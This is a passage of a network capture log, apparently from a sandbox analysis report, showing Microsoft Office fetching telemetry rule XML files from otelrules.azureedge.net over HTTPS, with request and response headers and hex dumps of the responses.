                                                                                                                                                                                                2024-11-23 15:54:42 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                108192.168.2.44994113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:42 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:42 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1405
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                x-ms-request-id: b43d4aba-301e-0020-1845-3c6299000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155442Z-178bfbc474bxkclvhC1NYC69g400000004h000000000fyh5
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:43 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                109192.168.2.44994213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:42 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:43 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1401
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                x-ms-request-id: 3272c5ec-601e-003d-7d76-3b6f25000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155443Z-174c587ffdfp4vpjhC1TEBybqw000000032g00000000h6dn
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:43 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                110192.168.2.44994313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:42 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:43 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1368
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                x-ms-request-id: f18ba134-001e-008d-7b76-3bd91e000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155443Z-15b8b599d885v8r9hC1TEB104g0000000380000000005nk8
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:43 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                111192.168.2.44994413.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:42 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:43 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1364
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                x-ms-request-id: 6d656984-c01e-008d-0d1b-3d2eec000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155443Z-178bfbc474btvfdfhC1NYCa2en00000004q000000000ehez
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:43 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                112192.168.2.44994613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:44 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:45 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1397
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                x-ms-request-id: d8182971-801e-0067-2581-3bfe30000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155445Z-174c587ffdfmlsmvhC1TEBvyks00000003b00000000069k4
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:45 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                113192.168.2.44994713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:44 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:45 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1360
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155445Z-178bfbc474bscnbchC1NYCe7eg00000004x0000000002vwb
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:45 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                114192.168.2.44994813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:45 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:45 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1403
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                x-ms-request-id: 529557e1-c01e-0079-5045-3ce51a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155445Z-15b8b599d886w4hzhC1TEBb4ug000000033000000000k4q2
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:45 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                115192.168.2.44994913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:45 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:45 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1366
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                x-ms-request-id: a0a34a76-601e-0050-3b16-3d2c9c000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155445Z-178bfbc474b9xljthC1NYCtw9400000004h000000000f95c
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:45 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                116192.168.2.44995013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:45 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:45 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1397
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                x-ms-request-id: c780bae6-901e-005b-04c5-3b2005000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155445Z-174c587ffdfgcs66hC1TEB69cs00000003300000000026v0
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:45 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                117192.168.2.44995113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:46 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
